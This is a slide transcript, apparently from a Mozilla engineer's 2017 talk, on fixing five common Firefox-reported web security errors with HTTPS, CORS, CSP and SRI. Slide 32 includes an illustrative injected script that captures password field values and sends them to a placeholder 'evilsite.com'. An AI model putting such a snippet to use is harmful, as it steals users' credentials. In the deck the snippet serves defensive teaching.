Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Top" 5 Security Errors We See From Firefox and...

luke crouch
January 25, 2017
Technology
1
180

"Top" 5 Security Errors We See From Firefox and How to Fix Them

The most common security errors & warnings that developers see in the Firefox console are not that hard to fix. This talk covers what they are, why they are dangerous, and how to fix them.

luke crouch

January 25, 2017
Tweet

More Decks by luke crouch

See All by luke crouch
Pigeons to Padlocks: 5000 years of Network Security
groovecoder
0
28
cryptory-up-to-https-atlas-2024.pdf
groovecoder
0
42
Cryptography: 500 BC to https
groovecoder
0
100
Mozilla Observatory First Draft
groovecoder
0
93
VPNs
groovecoder
0
94
Digital Privacy & Security
groovecoder
0
220
Cryptography: 500 BC to Quantum Computing
groovecoder
0
500
Just enough bitcoing to go cryptojacking with JavaScript
groovecoder
0
63
Can we protect Privacy without breaking the web
groovecoder
0
110

Other Decks in Technology

See All in Technology
DatabricksにおけるLLMOpsのベストプラクティス
taka_aki
4
1.6k
フルカイテン株式会社 採用資料
fullkaiten
0
40k
AI機能の開発運用のリアルと今後のリアル
akiroom
0
250
RAGのためのビジネス文書解析技術
eida
3
660
エンジニア候補者向け資料2024.11.07.pdf
macloud
0
4.5k
10分でわかるfreeeのQA
freee
1
3.5k
Spring Frameworkの新標準!? ~ RestClientとHTTPインターフェース入門 ~
ogiwarat
2
260
いろんなものと両立する Kaggleの向き合い方
go5paopao
2
970
隣接領域をBeyondするFinatextのエンジニア組織設計 / beyond-engineering-areas
stajima
1
230
Platform Engineering ことはじめ
oracle4engineer
PRO
8
810
Deno+JSRでパッケージを作って公開する
askua
0
120
SREによる隣接領域への越境とその先の信頼性
shonansurvivors
1
400

Featured

See All Featured
We Have a Design System, Now What?
morganepeng
50
7.2k
JavaScript: Past, Present, and Future - NDC Porto 2020
reverentgeek
47
5k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Speed Design
sergeychernyshev
24
600
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
24k
Building Adaptive Systems
keathley
38
2.3k
Gamification - CAS2011
davidbonilla
80
5k
Facilitating Awesome Meetings
lara
49
6.1k
Intergalactic Javascript Robots from Outer Space
tanoku
268
27k
Raft: Consensus for Rubyists
vanstee
136
6.6k
Art, The Web, and Tiny UX
lynnandtonic
297
20k
The Cult of Friendly URLs
andyhume
78
6k

Transcript

  1. Fixing the Top 5 Web Security Errors We see from

    Firefox Luke Crouch • Privacy + Security Engineer, Mozilla • @groovecoder

  2. Me. I’m Luke Crouch. I work on Privacy & Security.

    I click thru slides really fast. Twitter: @groovecoder 2

  3. The “Top 5”* 3 * MDN Google Analytics: Pageviews in

    /en-US/docs/Web/Security from utm_medium=firefox-console-errors

  4. 05 Same-Origin Policy

  5. None
  6. None

  7. Cross-Origin Request 7 http://www.evilcorp.com <html> … <script> new XMLHttpRequest().open( “GET”,

    “boss.bankofamerica.com/data.json” ); </script> … </html>

  8. Cross-Origin Request Threats 8 Attacker •Any Malicious Origin • Phishing

    & Malware Sites • Compromised CDNs • Untrusted First Parties Attacks •Steal data from other origins

  9. “Fix”: All browsers enforce Same-Origin Policy

  10. “Fix”: Use HTTP Access Control (CORS) to allow cross-origin access

  11. HTTP Access Control (CORS) 11 https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  12. HTTP Access Control (CORS) 12 http://public.slidesharecdn.com/data.json … Access-Control-Allow-Origin: www.slideshare.net …

    http://www.slideshare.net <html> … <script> new XMLHttpRequest().open( “GET”, “public.slidesharecdn.com/data.json” ); </script> … </html> https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS

  13. 04 Form Autocompletion

  14. I couldn’t find the specific errors, so, in general …

  15. By default, Browsers remember what users submit via input fields

  16. Form Autocompletion 16

  17. Form autocompletion 17 <form method=“post” action=“/updatePII”> <input type=“text” name=“ssn” >

    … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc”> … </form> https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  18. Form auto-complete Threats 18 Attacker •Malware authors •Over-the-shoulder Attacks •Steal

    the data from a file •Steal the data from the screen

  19. Disabling for sensitive information 19 <form method=“post” action=“/updatePII” autocomplete=“off”> <input

    type=“text” name=“ssn” > … </form> <form method=“post” action=“/form”> <input type=“text” name=“cc” autocomplete=“off”> … </form> Disable for the entire form Disable for 1 field* https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  20. Caveat: login fields ; browsers want to remember this 20

    <form method=“post” action=“/form”> <input type=“text” name=“username” autocomplete=“off”> <input type=“password” name=“password” autocomplete=“off”> … </form> Has no effect; browser still offers to remember https://developer.mozilla.org/en-US/docs/Web/Security/Securing_your_site/Turning_off_form_autocompletion

  21. 03 Weak Signature Algorithms

  22. None

  23. Weak Signature Algorithms Threats 23 Attacker •Malicious host •(with redirect

    or MITM vector) Attacks •Collision: Fraudulent certificates •2008 - md5: RapidSSL, Microsoft •2015 - SHA-1: “The SHAppening”

  24. Weak Signature Algorithms 24 $ openssl req -new -newkey rsa:2048

    -nodes -sha1 \ -out thecustomizewindows.com.csr \ -keyout thecustomizewindows.com.key $ openssl req -in thecustomizewindows.com.csr -noout -text Certificate Request: … Signature Algorithm: sha1WithRSAEncryption

  25. Fixing weak signatures is the same as fixing …

  26. 02 Insecure Passwords (Transmission)

  27. None
  28. None

  29. Insecure passwords 29 http://www.espn.com <html> … <form action=“/login"> <input type=“password”

    /> … </html>

  30. Insecure passwords 30 https://www.espn.com <html> … <form action=“http://www.espn.com/login" <input type=“password”

    /> … </html>

  31. Insecure passwords 31 http://www.espn.com <html> … <form action=“https://www.espn.com/login" <input type=“password”

    /> … </html> THIS IS NOT SECURE!

  32. Insecure passwords 32 http://www.espn.com <html> <script> // Injected via HTTP

    MitM […document.querySelectorAll(“[type=‘password’]”)].forEach(pwInput=>{ pwInput.addEventListener(“change”, ()=> { fetch(“evilsite.com”, {method: “POST”, body: pwInput.value}); }); }); </script> … <form action=“https://www.espn.com/login" <input type=“password” /> … </html> SEE, TOLD YOU SO!

  33. Insecure password transmission Threats 33 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Steal password ๏+ Password reuse

  34. Fixing weak signatures and insecure passwords is the same as

    fixing …

  35. 01 Mixed Content

  36. None

  37. Insecure active content 37 <script>, <link>, <iframe>, <object>, XMLHttpRequest, @font-face,

    cursor, background-image, etc. https://www.dailymotion.com/us <html> … <script src=“http://mc.dailymotion.com/masscast/2/dailymotion.us/ home/76127265087”> </script> … </html>

  38. Insecure active content Threats 38 Attacker • Man-in-the-middle: • Open

    WiFi • ISP • Proxies Attacks • Steal credentials • Steal sensitive data from DOM • Alter behavior of DOM • Install malware

  39. Browsers already fix insecure active content for you by blocking

    it

  40. insecure passive/display content

  41. None

  42. Insecure passive/display content 42 <img>, <audio>, <video>, <object> https://www.booking.com/ <html>

    … <img src=“http://tags.w55c.net/rs? id=c332832256414794bb465731a031be55& t=homepage” /> … </html>

  43. Insecure passive/display content Threats 43 Attacker •Man-in-the-middle: • Open WiFi

    • ISP • Proxies Attacks •Break page •Snoop content •Inject Misleading content

  44. Snooping Session Cookies

  45. Snooping Session Cookies 45

  46. Snooping Session Cookies = Session Hijacking 46

  47. Snooping Session Cookies = Session Hijacking 47

  48. Snooping Session Cookies = Session Hijacking 48

  49. Snooping Other Cookies

  50. Snooping Other Cookies 50

  51. Snooping Other Cookies 51

  52. Sneak Peak: Cookie Syncing 52 https://freedom-to-tinker.com/blog/englehardt/the-hidden-perils-of-cookie-syncing/

  53. Fixing weak signatures, insecure passwords, AND insecure content

  54. HTTPS ALL THE THINGS!

  55. None

  56. +

  57. None
  58. None

  59. certbot + Let’s Encrypt 59 brew install certbot sudo certbot

    certonly --manual —preferred-challenges dns

  60. certbot + Let’s Encrypt 60

  61. certbot + Let’s Encrypt 61 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  62. Deploy the TXT record to your DNS

  63. certbot + Let’s Encrypt 63 Please deploy a DNS TXT

    record under the name _acme-challenge.www.codesy.io with the following value: CxYdvM…5WvXR0 Once this is deployed, Press ENTER to continue

  64. Add signed cert to your site!

  65. None
  66. None

  67. Yay! You secured your site!

  68. But there’s legacy insecure content! 68 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  69. Content-Security-Policy

  70. Content-Security-Policy 70 Content-Security-Policy: default-src https:; Enforce https: for all src

    https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP

  71. good: upgrade-insecure-requests 71 Content-Security-Policy: default-src https:; upgrade-insecure-requests; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/upgrade-insecure-requests Change http

    links to https

  72. upgrade-insecure-requests 72 http://webappsec-test.info/~bhill2/DifferentTakeOnOE.html

  73. better: block-all-mixed-content 73 Content-Security-Policy: block-all-mixed-content; https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/block-all-mixed-content On https pages, block

    http requests

  74. How do you know which content is insecure?

  75. Content-Security-Policy-Report-Only 75 Content-Security-Policy-Report-Only: default-src https:; block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly Do

    not enforce; only report violations https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only

  76. Content-Security-Policy report-uri 76 Report violations here https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/report-uri Content-Security-Policy-Report-Only: default-src https:;

    block-all-mixed-content; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

  77. report-uri.io 77

  78. What if you have to use insecure resources?

  79. Sub-Resource Integrity

  80. Subresource Integrity (SRI) 80 https://example.com <html> … <script src=“http://examplecdn.com/framework.js” crossorigin=“anonymous”

    integrity=“sha512-oqVuAfXRKap7fdgc…”> </script> … https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity Hash Algorithm Hash Digest

  81. What if resources add their own <script> or <style> elements?

  82. require-sri-for 82 https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP Content-Security-Policy-Report-Only: require-sri-for script style; report-uri https://groovecoder.report-uri.io/r/default/csp/ reportOnly

    Require sri attributes on all <script> and <style> elements

  83. But, yeah … HTTPS ALL THE THINGS!

  84. +

  85. Thanks. Luke Crouch Twitter: @groovecoder groovecoder.com 85